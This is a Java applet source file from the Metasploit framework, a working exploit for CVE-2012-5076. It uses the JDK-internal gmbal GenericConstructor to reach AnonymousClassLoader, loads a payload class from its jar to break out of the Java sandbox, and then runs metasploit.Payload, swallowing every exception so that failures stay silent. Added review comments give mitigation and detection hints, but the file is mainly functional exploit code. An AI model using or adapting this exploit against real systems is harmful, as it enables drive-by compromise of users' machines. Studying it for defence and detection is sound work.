metasploit-gs/external/source/exploits/cve-2012-5076/Exploit.java
2012-11-11 20:11:33 +01:00


import java.applet.Applet;
import java.io.PrintStream;
import java.io.Serializable;
import java.lang.reflect.Method;
import com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory;
import com.sun.org.glassfish.gmbal.util.GenericConstructor;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import metasploit.Payload;
//import java.lang.Runtime;
/**
 * Proof-of-concept applet for CVE-2012-5076 (the CVE id is taken from this file's
 * path in the Metasploit source tree).
 *
 * <p>What the visible code does, in order: it reads {@code MyPayload.class} from the
 * applet's own jar, obtains an instance of {@code sun.invoke.anon.AnonymousClassLoader}
 * through {@code GenericConstructor}, looks up that object's {@code loadClass(byte[])}
 * through {@code ManagedObjectManagerFactory.getMethod}, defines and instantiates the
 * class from the bytes, and finally calls {@code metasploit.Payload.main}.
 *
 * <p>Notes for defenders and reviewers:
 * <ul>
 *   <li>Both helpers live in {@code com.sun.org.glassfish.gmbal}, a JDK-internal package.
 *       NOTE(review): public write-ups attribute the issue to that package being reachable
 *       from sandboxed code (not covered by the {@code package.access} security property);
 *       this file does not show that, so confirm against the vendor advisory.</li>
 *   <li>Mitigation is a JRE update that addresses CVE-2012-5076, and disabling the browser
 *       Java plug-in where applets are not required.</li>
 *   <li>For static triage, a jar whose classes reference {@code GenericConstructor} together
 *       with the string {@code sun.invoke.anon.AnonymousClassLoader} matches the pattern
 *       used here.</li>
 * </ul>
 */
public class Exploit extends Applet
{
/** No-argument constructor; it performs no work. */
public Exploit()
{
}
/**
 * Decodes a hexadecimal string into bytes, two characters per byte.
 *
 * <p>The only call to this helper in the file is commented out, so it is unused as shown.
 *
 * @param str hex digits; a trailing odd character is ignored because the output length
 *            is {@code str.length() / 2}
 * @return the decoded bytes
 * @throws NumberFormatException if a two-character pair is not valid base-16
 */
public byte[] hex2Byte(String str)
{
byte[] bytes = new byte[str.length() / 2];
for (int i = 0; i < bytes.length; i++)
{
// Integer.parseInt yields 0..255; the cast narrows it to a signed byte.
bytes[i] = (byte) Integer
.parseInt(str.substring(2 * i, 2 * i + 2), 16);
}
return bytes;
}
/**
 * Applet entry point: runs the whole sequence described on the class.
 *
 * <p>Every exception is caught and discarded, so the applet fails silently and leaves
 * no stack trace in the Java console when any step is blocked (for example on a runtime
 * where the internal classes are not reachable).
 */
public void init()
{
try
{
// Hex String for MyPayload.class
//String my_payload = "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";
//byte[] byte_payload = hex2Byte(my_payload);
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] buffer = new byte[8192];
int length;
// read in the class file from the jar
// NOTE(review): getResourceAsStream returns null when the resource is absent; the
// resulting NullPointerException is swallowed by the catch below. The stream is
// also never closed.
InputStream is = getClass().getResourceAsStream("MyPayload.class");
// and write it out to the byte array stream
while( ( length = is.read( buffer ) ) > 0 )
bos.write( buffer, 0, length );
// convert it to a simple byte array
buffer = bos.toByteArray();
// The target class is named by string, so there is no compile-time reference to
// sun.invoke.anon.AnonymousClassLoader; the class is obtained at run time through
// GenericConstructor.
// NOTE(review): presumably GenericConstructor performs the lookup with the JDK's own
// privileges -- its implementation is not visible in this file.
GenericConstructor genericconstructor = new GenericConstructor(Object.class, "sun.invoke.anon.AnonymousClassLoader", new Class[0]);
Object obj = genericconstructor.create(new Object[] {});
// Look up loadClass(byte[]) on the object created above through the gmbal helper.
Method method = ManagedObjectManagerFactory.getMethod(obj.getClass(), "loadClass", new Class[] { byte[].class });
// Define a class from the raw bytes read out of the jar.
Class class1 = (Class)method.invoke(obj, new Object[] {
//byte_payload
buffer
});
// Instantiating the class runs its static initializer and constructor. What MyPayload
// does is not shown in this file; the commented-out SecurityManager print below
// suggests it alters the security manager -- TODO confirm against MyPayload's source.
class1.newInstance();
//System.out.println("SecurityManager:" + System.getSecurityManager());
//class1.getMethod("r", new Class[0]).invoke(class1, new Object[0]);
// Hands control to the framework payload class imported as metasploit.Payload.
Payload.main(null);
//Runtime.getRuntime().exec("calc.exe");
}
catch(Exception exception)
{
// Deliberately silent: no failure is reported to the Java console.
//exception.printStackTrace();
}
}
}